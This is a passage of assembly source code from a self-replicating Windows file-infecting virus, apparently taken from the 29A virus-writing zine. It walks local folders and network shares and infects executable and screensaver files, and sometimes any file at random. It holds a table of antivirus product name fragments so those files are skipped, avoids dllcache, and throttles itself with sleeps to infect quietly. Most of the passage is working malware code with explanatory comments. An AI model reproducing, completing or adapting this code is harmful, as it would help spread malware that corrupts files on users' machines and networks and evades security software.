📄 29a-7.007
call enum_path_1
db 'rary Inter',0
enum_path_1:
pop edi
mov ebx,esi
push esi ;ESI must be protected because SUBCALL will destroy it.
SUBCALL str_instr,enum_path_ip
pop esi
jz short enum_next_file_jmpz
;Don't infect files in dllcache
push esi
SUBCALL is_in_dllcache,enum_path_ip
pop esi
enum_next_file_jmpz:
jz short enum_next_file
mov ecx,MAX_DIR_SIZE
sub esp,ecx
mov edi,esp
rep movsb
call enum_path ;recursion infect path
add esp,MAX_DIR_SIZE ;clear stack frame
enum_next_file_jmp1:
jmp short enum_next_file
enum_do_fop:
;Check AV file
not eax
call eax_to_lowcase
lea edi,[ebp+av_name-enum_path_ip]
push large av_name_num
pop ecx
repnz scasd
jz short enum_next_file_jmp1
and eax,00ffffffh
cmp eax,'0pva' and 00ffffffh ;avp
jz short enum_next_file_jmp1
cmp eax,'0van' and 00ffffffh ;nav
jz short enum_next_file_jmp1
mov edi,esi
;For quick and quiet infection,I'd better check the file extension
;But for infect widely,I have 1/4 chance to infect any file without check its extension.
call find_str_tail
mov eax,[edi-4]
call eax_to_lowcase
cmp eax,'exe.'
jz short enum_do_fop_1
cmp eax,'rcs.'
jz short enum_do_fop_1
test byte ptr [ebp+callsub_seed-enum_path_ip],3
enum_next_file_jmpnz:
jnz short enum_next_file
enum_do_fop_1:
mov edi,esi
SUBCALL file_operate,enum_path_ip
enum_next_file:
call have_a_sleep
lea eax,[esp+4] ;WIN32_FIND_DATA
mov ecx,[esp] ;find file handle
push eax
push ecx
call [ebp+addrFindNextFileA-enum_path_ip]
or eax,eax
jnz found_one_file
infect_one_path_close:
;Now esp->find file handle
call [ebp+addrFindClose-enum_path_ip]
enum_path_ok:
add esp,size WIN32_FIND_DATA ;clear stack frame
popad
retn
enum_path_end:
;----------------------------------------------------------------------
;av_name - table of 4-byte fragments of security-product names.
;enum_do_fop (above) lowercases a dword taken from the file name and
;scans this table with repnz scasd (ecx=av_name_num); on a hit the file
;is skipped.  Each dd literal reads reversed because MASM stores 'abcd'
;with 'a' in the most significant byte, so the bytes in memory spell
;the fragment given in the trailing comment (e.g. "_avp").
;----------------------------------------------------------------------
av_name equ this dword
dd 'pva_' ;_avp
dd 'rela' ;aler
dd 'noma' ;amon
dd 'itna' ;anti
dd '3don' ;nod3
dd 'sspn' ;npss
dd 'sern' ;nres
dd 'hcsn' ;nsch
dd 's23n' ;n32s
dd 'iwva' ;avwi
dd 'nacs' ;scan
dd 'ts-f' ;f-st
dd 'rp-f' ;f-pr
av_name_num equ ($-av_name)/4 ;entry count: bytes emitted since av_name, one dword each
;----------------------------------------------------------------------
;enum_net - enumerate network disk resources (WNet* API) and hand every
;non-container entry to enum_path; container entries are recursed into.
;in--eax=lpNetResource for WNetOpenEnumA (a NETRESOURCE entry when
;    called recursively from enum_net_loop; presumably 0 at the
;    top-level call, which is outside this fragment)
;    ebp=main_thread_ip (enum_net_ip); API pointers are ebp-relative
;out--all registers restored (pushad/popad); flags clobbered
;Stack frame: 4*3+MAX_NETRESOURCE_NUM*8*4 bytes, see the stack map below.
;Entries whose remote name ends in "\a" or "\b" are skipped (see below).
;----------------------------------------------------------------------
enum_net:
enum_net_ip equ main_thread_ip ;relies on the ebp value left by main_thread
pushad
mov ebx,4*3+MAX_NETRESOURCE_NUM*8*4-4 ;frame size minus the 4-byte handle slot pushed below
mov ecx,1000h ;one page per probe step
;Stack probe: lower esp one page at a time and touch each new page
;(push/pop) before the frame is used - presumably so the stack guard
;page is committed page by page for a frame larger than one page.
probpage_loop:
sub ebx,ecx
jb short probpage_end ;less than a page left
sub esp,ecx
push ecx ;touch the page
pop ecx
jmp short probpage_loop
probpage_end:
add ebx,ecx ;ebx=remaining (<1000h) bytes
sub esp,ebx
;Stack map
;esp->enumeration handle
;esp+4->number of entries=-1
;esp+8->buffer size=MAX_NETRESOURCE_NUM*8*4
;esp+0ch->buffer
push large 0 ;handle slot; zero lets enum_net_ret tell "never opened"
mov ecx,[ebp+addrWNetOpenEnumA-enum_net_ip]
jecxz enum_net_ret_jmp ;API not resolved: ecx=0 falls through both jecxz below to enum_net_ret
;WNetOpenEnumA(RESOURCE_GLOBALNET,RESOURCETYPE_DISK,RESOURCEUSAGE_ALL,lpNetResource=eax,lphEnum=esp)
push esp ;lphEnum -> handle slot
push eax ;lpNetResource
push large RESOURCEUSAGE_ALL
push large RESOURCETYPE_DISK
push large RESOURCE_GLOBALNET
call ecx
or eax,eax ;0 = NO_ERROR
jnz short enum_net_ret_jmpnz
mov ecx,[ebp+addrWNetEnumResourceA-enum_net_ip]
enum_net_ret_jmp:
jecxz enum_net_ret_jmp2 ;API not resolved (or reached with ecx=0 from above)
mov esi,[esp] ;esi=enumeration handle
lea edi,[esp+8] ;edi->buffer size
mov dword ptr [edi],MAX_NETRESOURCE_NUM*8*4 ;NETRESOURCE is 8 dwords, so the buffer holds MAX_NETRESOURCE_NUM entries
push edi ;lpBufferSize
lea edi,[esp+0ch+4] ;edi->buffer (+4 for the push just made)
push edi ;lpBuffer
lea edi,[esp+4+4*2] ;edi->number of entries (+8 for the two pushes)
dec eax ;eax was 0 (NO_ERROR) -> -1 = "as many entries as fit"
mov dword ptr [edi],eax
push edi ;lpcCount
push esi ;hEnum
call ecx ;WNetEnumResourceA(hEnum,lpcCount,lpBuffer,lpBufferSize)
or eax,eax ;0 = NO_ERROR
enum_net_ret_jmpnz:
jnz short enum_net_ret ;shared failure exit for both WNet calls above
mov ecx,[edi] ;ecx=number of entries returned (edi still ->count)
enum_net_ret_jmp2:
jecxz enum_net_ret ;nothing enumerated
;Walk the NETRESOURCE array backwards: entry index=ecx-1, each entry is
;8*4 bytes, so entry base = esp+0ch+(ecx-1)*32 = esp+edx*8+0ch-8*4 with
;edx=ecx*4.  Field offsets used: +4*3 dwUsage, +4*5 lpRemoteName.
enum_net_loop:
lea edx,[ecx*4]
test dword ptr [esp+edx*8+0ch-8*4+4*3],RESOURCEUSAGE_CONTAINER ;dwUsage is RESOURCEUSAGE_CONTAINER?
jz short not_container ;no
lea eax,[esp+edx*8-8*4+0ch] ;eax->this NETRESOURCE = lpNetResource of the nested enumeration
call enum_net ;recurse infect the container (its pushad/popad keeps ecx for the loop)
jmp short enum_net_loop_next
not_container:
mov esi,[esp+edx*8+0ch-8*4+4*5] ;esi=lpRemoteName
or esi,esi
jz short enum_net_loop_next ;no remote name
mov edi,esi
call find_str_tail ;edi->terminating NUL
mov eax,[edi-2] ;last two characters, the NUL, and one byte past it
call eax_to_lowcase
and eax,00ffffffh ;keep the last two characters and the NUL
;The constants below are 4-char literals masked to their low 16 bits,
;i.e. the bytes '\','a' (resp. '\','b') in memory order; because the
;mask keeps the NUL, only a name whose tail is "\a" / "\b" matches.
cmp eax,'00a\' and 0000ffffh ;is '\a'?If so,maybe floppy,don't infect it
jz short enum_net_loop_next
cmp eax,'00b\' and 0000ffffh ;is '\b'?If so,maybe floppy,don't infect it
jz short enum_net_loop_next
sub esp,MAX_DIR_SIZE ;temporary path buffer for enum_path
mov edi,esp
;OUTSTRING3 esi,enum_net_ip
enum_net_1:
lodsb
stosb
or al,al
jnz short enum_net_1 ;copy remote name (byte by byte, including the terminating NUL)
call enum_path ;copied name is at esp; enum_path's input convention is outside this fragment
add esp,MAX_DIR_SIZE
enum_net_loop_next:
loop enum_net_loop ;next (lower-indexed) entry
enum_net_ret:
;esp->enumeration handle
pop eax ;eax=handle (0 if the enumeration was never opened)
mov ecx,[ebp+addrWNetCloseEnum-enum_net_ip]
jecxz enum_net_ret_1 ;API not resolved
or eax,eax
jz enum_net_ret_1 ;no handle to close
push eax
call ecx ;WNetCloseEnum(hEnum)
enum_net_ret_1:
add esp,4*3+MAX_NETRESOURCE_NUM*8*4-4 ;release the frame (handle slot already popped)
popad
ret
enum_net_end:
;----------------------------------------------------------------------
;goto_enum_proc - rate-limited entry to enum_proc: runs enum_proc at
;most once every 60 seconds, measured with GetTickCount.
;in--nothing (self-locating: ebp set via call/pop)
;out--all registers and flags restored (pushad/pushfd ... popfd/popad)
;Note: the last-run timestamp lives inside the instruction stream (the
;imm32 of "mov ebx,12345678h", see goto_enum_proc_pretime) and is
;overwritten at run time, so the code page must be writable.
;----------------------------------------------------------------------
goto_enum_proc:
pushad
pushfd
call goto_enum_proc_ip
goto_enum_proc_ip:
pop ebp ;ebp=run-time address of goto_enum_proc_ip (delta base)
;Can't infect process too frequently,if so,some program will corrupt when they start.
call [ebp+addrGetTickCount-goto_enum_proc_ip]
mov ebx,12345678h ;placeholder immediate, patched below with the last run's tick count
goto_enum_proc_pretime equ $-4 ;address of that imm32
mov ecx,eax
sub ecx,ebx ;ecx=milliseconds since the last run
cmp ecx,1000*60 ;Only more than every one minute to infect process
jc short goto_enum_proc_1 ;unsigned below 60000ms: too soon
mov [ebp+goto_enum_proc_pretime-goto_enum_proc_ip],eax ;record this run (writes into the code)
SUBCALL enum_proc,goto_enum_proc_ip ;SUBCALL macro defined elsewhere
goto_enum_proc_1:
popfd
popad
retn
;----------------------------------------------------------------------
;have_a_sleep - pacing: once the code has been running for ebx
;milliseconds since the last wake-up, Sleep for esi<<10 milliseconds,
;then refresh the quick_sleep flag and run goto_enum_proc.
;  quick_sleep==0: run 500ms, then sleep 50<<10 = 51200ms (~51s)
;  quick_sleep!=0: run 3000ms, then sleep 20<<10 = 20480ms (~20s)
;in--nothing (self-locating: ebp set via call/pop)
;out--all registers restored (pushad/popad); flags clobbered
;Note: the last wake-up time is stored in the imm32 of
;"mov ebx,12345678h" (have_a_sleep_pretime) - the code page is written.
;Called from enum_path's enum_next_file loop (above), i.e. once per
;enumerated file.
;----------------------------------------------------------------------
have_a_sleep:
pushad
call have_a_sleep_ip
have_a_sleep_ip:
pop ebp ;delta base
mov edi,[ebp+addrGetTickCount-have_a_sleep_ip]
call edi ;eax=now
mov ebx,12345678h ;placeholder, patched with the last wake-up tick count
have_a_sleep_pretime equ $-4
sub eax,ebx ;eax=ms running since the last wake-up
mov ebx,500 ;If isn't quick sleep,continue run for 500 millisecond
push large 50 ;Sleep for 50 seconds (actually 50<<10 = 51200ms, see the shl below)
pop esi
mov ecx,[ebp+quick_sleep-have_a_sleep_ip]
jecxz have_a_sleep_1 ;Not quick sleep
mov ebx,3000 ;If is quick sleep,continue run for 3000 millisecond
push large 20 ;Sleep for 20 seconds (actually 20<<10 = 20480ms)
pop esi
have_a_sleep_1:
cmp eax,ebx
jc short have_a_sleep_ret ;not yet time to sleep
shl esi,10 ;*1024: "seconds" to (approximate) milliseconds
push esi
call [ebp+addrSleep-have_a_sleep_ip] ;Sleep(esi)
call edi ;GetTickCount again
mov [ebp+have_a_sleep_pretime-have_a_sleep_ip],eax ;new last wake-up time (writes into the code)
call test_quick_sleep ;expects ebp=have_a_sleep_ip (test_qs_ip)
call goto_enum_proc
have_a_sleep_ret:
popad
retn
have_a_sleep_end:
;----------------------------------------------------------------------
;test_quick_sleep - refresh the quick_sleep flag.
;in--ebp->have_a_sleep_ip
;Tries OpenFileMappingA(FILE_MAP_WRITE,0,MUTEX_NAME).  If the named
;mapping already exists it is just closed again and nothing changes.
;Otherwise create_mem_map (outside this fragment) is called with eax=1;
;when it reports success (ZF clear) its eax result is stored in
;quick_sleep and passed to UnmapViewOfFile, so quick_sleep becomes
;nonzero.  The intent is presumably "this instance created the marker
;object" - confirm against create_mem_map.
;out--eax,edi and flags clobbered (no pushad here); other effects of
;SUBCALL/create_mem_map are not visible
;Note: MUTEX_NAME (defined elsewhere) is a usable host-based indicator.
;----------------------------------------------------------------------
test_quick_sleep:
test_qs_ip equ have_a_sleep_ip ;shares the caller's delta base
call test_qs_1
db MUTEX_NAME ;object name; the call above leaves its address on the stack
test_qs_1:
pop edi ;edi->MUTEX_NAME
push edi ;lpName
push large 0 ;bInheritHandle
push large FILE_MAP_WRITE ;dwDesiredAccess
call [ebp+addrOpenFileMappingA-test_qs_ip]
or eax,eax
jz short test_qs_2 ;not present
push eax
call [ebp+addrCloseHandle-test_qs_ip] ;already exists: close it and leave quick_sleep as is
retn
test_qs_2:
inc eax ;eax=1 (argument/flag for create_mem_map)
SUBCALL create_mem_map,test_qs_ip
jz short test_qs_3 ;creation failed
mov [ebp+quick_sleep-test_qs_ip],eax ;nonzero => quick sleep mode
push eax
call [ebp+addrUnmapViewOfFile-test_qs_ip] ;eax is presumably the mapped view; release it
test_qs_3:
retn
test_quick_sleep_end:
;----------------------------------------------------------------------
;copy_path - copy a fixed MAX_DIR_SIZE-byte path block into pathname_buf
;----------------------------------------------------------------------
copy_path:
;in--esi->path,ebp->enum_path_ip
;on return,edi->pathname_buf
;side effects: ecx=0, esi advanced by MAX_DIR_SIZE, flags unchanged
;assumes DF=0 (forward movsb)
mov ecx,MAX_DIR_SIZE ;always copies the whole block, not up to a NUL
lea edi,[ebp+pathname_buf-enum_path_ip]
push edi ;keep the buffer address for the return value
rep movsb
pop edi
ret
;----------------------------------------------------------------------
;find_str_tail - advance edi to the terminating NUL of a C string
;----------------------------------------------------------------------
find_str_tail:
;edi->string,on return,edi->0 (the NUL byte itself)
;preserves eax,ecx; flags clobbered; assumes DF=0
;The scan count is formed by writing only ch=0ffh: cl and the upper
;word of ecx keep whatever the caller had, so the scan is bounded by at
;least 0ff00h bytes rather than by a known length.
push eax
push ecx
xor eax,eax ;al=0: byte to look for
mov ch,0ffh ;see note above
repnz scasb ;edi ends one past the NUL
dec edi ;back onto the NUL
pop ecx
pop eax
ret
;----------------------------------------------------------------------
;eax_to_lowcase - ASCII-lowercase each of the 4 bytes in eax in place.
;in--eax=4 characters
;out--eax=same characters with 'A'..'Z' replaced by 'a'..'z' (four
;ror 8 steps bring the bytes back to their original positions)
;preserves ecx; flags clobbered
;----------------------------------------------------------------------
eax_to_lowcase:
push ecx
push large 4 ;one step per byte
pop ecx
eax_to_lowcase_0:
cmp al,'A'
jc eax_to_lowcase_1 ;below 'A' (unsigned)
cmp al,'Z'
ja eax_to_lowcase_1 ;above 'Z'
add al,'a'-'A' ;+20h
eax_to_lowcase_1:
ror eax,8 ;next byte into al
loop eax_to_lowcase_0
pop ecx
retn
main_thread_end: ;end of the main-thread code section
;in--ebx->string,edi->sub string to find
;out--ZF set means is in string,ZF cleared means not in
;Case-insensitive substring search built on lstrcmpiA: for each start
;position in the string, the next sublen bytes are temporarily NUL-
;terminated and compared with the sub string, then the byte is
;restored.  The searched string must therefore be writable.  All
;registers are restored (pushad/popad); only ZF carries the result.
;If lstrcmpiA was not resolved the result is "not in" (al=38h keeps
;eax nonzero for the final "or eax,eax").
CALLHEADER str_instr ;macro defined elsewhere
str_instr:
pushad
call str_instr_ip
str_instr_ip:
pop ebp ;delta base
cld ;str_len below relies on forward scans
mov al,38h ;ensure eax!=0 for the early exit below
mov ebp,[ebp+addrlstrcmpiA-str_instr_ip] ;ebp=lstrcmpiA from here on
or ebp,ebp
jz short str_instr_ret ;API missing -> ZF cleared at str_instr_ret
dec ebx
str_instr_1:
inc ebx ;next start position in the string
call str_len ;ecx=sub string len (edi->sub string)
mov esi,ecx ;esi=sub string len
xchg ebx,edi
call str_len ;ecx=remaining source string len (from ebx)
xchg ebx,edi
push large 38h
pop eax ;eax!=0 in case we exit via the ja below
cmp esi,ecx
ja short str_instr_ret ;sub string longer than what is left -> not found
mov dl,[ebx+esi] ;save the byte just after the window
push edx
push ebx
mov byte ptr [ebx+esi],0 ;terminate the window in place
push ebx ;lpString1 = window
push edi ;lpString2 = sub string
call ebp ;lstrcmpiA: 0 when equal ignoring case
or eax,eax ;the pops/movs below do not touch ZF
pop ebx
pop edx
mov [ebx+esi],dl ;restore the overwritten byte
jnz short str_instr_1 ;not equal: try the next position
str_instr_ret:
or eax,eax ;ZF=1 iff eax==0 (match)
popad
retn
;in--edi->string
;out--ecx=string length (bytes before the NUL)
;preserves edi; clobbers al and flags; assumes DF=0 (cld in str_instr)
str_len:
push edi
xor al,al ;scan for NUL
xor ecx,ecx
dec ecx ;ecx=-1: effectively unbounded count
repnz scasb ;afterwards ecx=-1-(len+1)
pop edi
not ecx ;ecx=len+1
dec ecx ;ecx=len
retn
str_len_end:
str_instr_end:
;in--ebx->full path
;out--ZF set is in,ZF cleared,not in
;Reports whether the path contains the fragment "tem32\dllcac", i.e.
;whether it lies under ...system32\dllcache.  enum_path (above) uses it
;to leave that directory alone.  Delegates to str_instr; registers are
;restored by popad and only ZF is returned (assuming the SUBCALL macro
;preserves it).
CALLHEADER is_in_dllcache
is_in_dllcache:
pushad
call is_in_dllcache_ip
is_in_dllcache_ip:
pop ebp ;delta base
call is_in_dllcache_1
db 'tem32\dllcac',0 ;sub string to look for; its address is the return address pushed above
is_in_dllcache_1:
pop edi ;edi->"tem32\dllcac"
SUBCALL str_instr,is_in_dllcache_ip ;ebx=full path,edi=sub string
popad
retn
is_in_dllcache_end:
;Out--edx=random
;Also updates the 16-bit callsub_seed (low word of the result), which
;enum_do_fop above tests for its "1 in 4" extension-check skip.
;Mixes GetTickCount, esp and the previous seed, then runs 32 rounds of
;a shift/xor (LFSR-style) step using HASH16FACTOR (defined elsewhere).
;The seed persists in the imm32 of "mov ecx,12345678h" (rand_seed) and
;is rewritten at run time - the code page must be writable.
;All registers but edx are restored (pushad/popad); flags clobbered.
CALLHEADER get_rand
get_rand:
pushad
call get_rand_ip
get_rand_ip:
pop ebp ;delta base
call [ebp+addrGetTickCount-get_rand_ip]
mov ecx,12345678h ;placeholder, patched below
rand_seed equ $-4
add eax,ecx ;eax=ticks+seed
rol ecx,1
add ecx,esp ;fold in the current stack pointer
add [ebp+rand_seed-get_rand_ip],ecx ;new seed (writes into the code)
push large 32
pop ecx ;32 rounds
get_rand_1:
shr eax,1
jnc get_rand_2
xor eax,HASH16FACTOR ;feedback when the shifted-out bit was 1
get_rand_2:
loop get_rand_1
mov [esp+5*4],eax ;overwrite the saved edx in the pushad frame -> returned in edx
mov [ebp+callsub_seed-get_rand_ip],ax ;16-bit side seed
popad
retn
get_rand_end:
;----------------------------------------------------------------------
;get_extra_proc - load the optional libraries and resolve their imports
;through search_api_addr (outside this fragment) using per-library hash
;tables: sfc_hash_table and mpr_hash_table (loop of two), then
;user32_hash_table via an explicit LoadLibraryA("user32").
;The name passed to LoadLibraryA for the first two is the 8 bytes that
;precede each hash table (edi=table-8), which presumably hold the
;NUL-terminated DLL name - confirm against the table definitions.
;ebx=module base-10000h is handed to search_api_addr; what it expects
;is not visible here.  A library that fails to load is skipped.
;out--all registers restored (pushad/popad); flags clobbered
;----------------------------------------------------------------------
CALLHEADER get_extra_proc
get_extra_proc:
pushad
call get_extra_proc_ip
get_extra_proc_ip:
pop ebp ;delta base
lea edi,[ebp+sfc_hash_table-8-get_extra_proc_ip] ;edi->name preceding the sfc table
push large 1 ;loop counter: one more table (mpr) after this one
get_extra_proc_0:
push edi ;lpLibFileName
call [ebp+addrLoadLibraryA-get_extra_proc_ip]
or eax,eax
jz short get_extra_proc_1 ;library not available: skip its table
mov ebx,eax
sub ebx,10000h
SUBCALL search_api_addr,get_extra_proc_ip ;edi->name/table,ebx=base-10000h
get_extra_proc_1:
pop ecx ;remaining table count
jecxz get_extra_proc_2
dec ecx
push ecx
lea edi,[ebp+mpr_hash_table-8-get_extra_proc_ip] ;second pass: mpr table (presumably the WNet* functions used by enum_net)
jmp short get_extra_proc_0
get_extra_proc_2:
call get_extra_proc_3 ;pushes the address of the string below, which serves as the LoadLibraryA argument
db 'user32',0
get_extra_proc_3:
call [ebp+addrLoadLibraryA-get_extra_proc_ip] ;LoadLibraryA("user32")
or eax,eax
jz short get_extra_proc_4
mov ebx,eax
sub ebx,10000h
lea edi,[ebp+user32_hash_table-8-get_extra_proc_ip]
SUBCALL search_api_addr,get_extra_proc_ip
get_extra_proc_4:
popad
retn
get_extra_proc_end:
;*******************************mainthrd.asm end*****************************
;code and initialized data end here
vir_size equ $-_start ;bytes from _start (defined elsewhere) to here = size of the body
;Uninitialized data
;These labels lie past the end of the body measured by vir_size and are
;addressed ebp-relative from the code above (e.g. quick_sleep).
ftime db 3*8 dup(0) ;24 bytes: three 8-byte values - presumably a host file's FILETIME triple, confirm
is9x dd 0 ;flag; the name suggests "running on Win9x"; not referenced in this fragment
quick_sleep dd 0 ;nonzero => quick sleep mode (set by test_quick_sleep, read by have_a_sleep)
infbuffer db vir_size+1 ;start of the work area following the body (this directive itself emits one byte; the room used at run time is not visible here)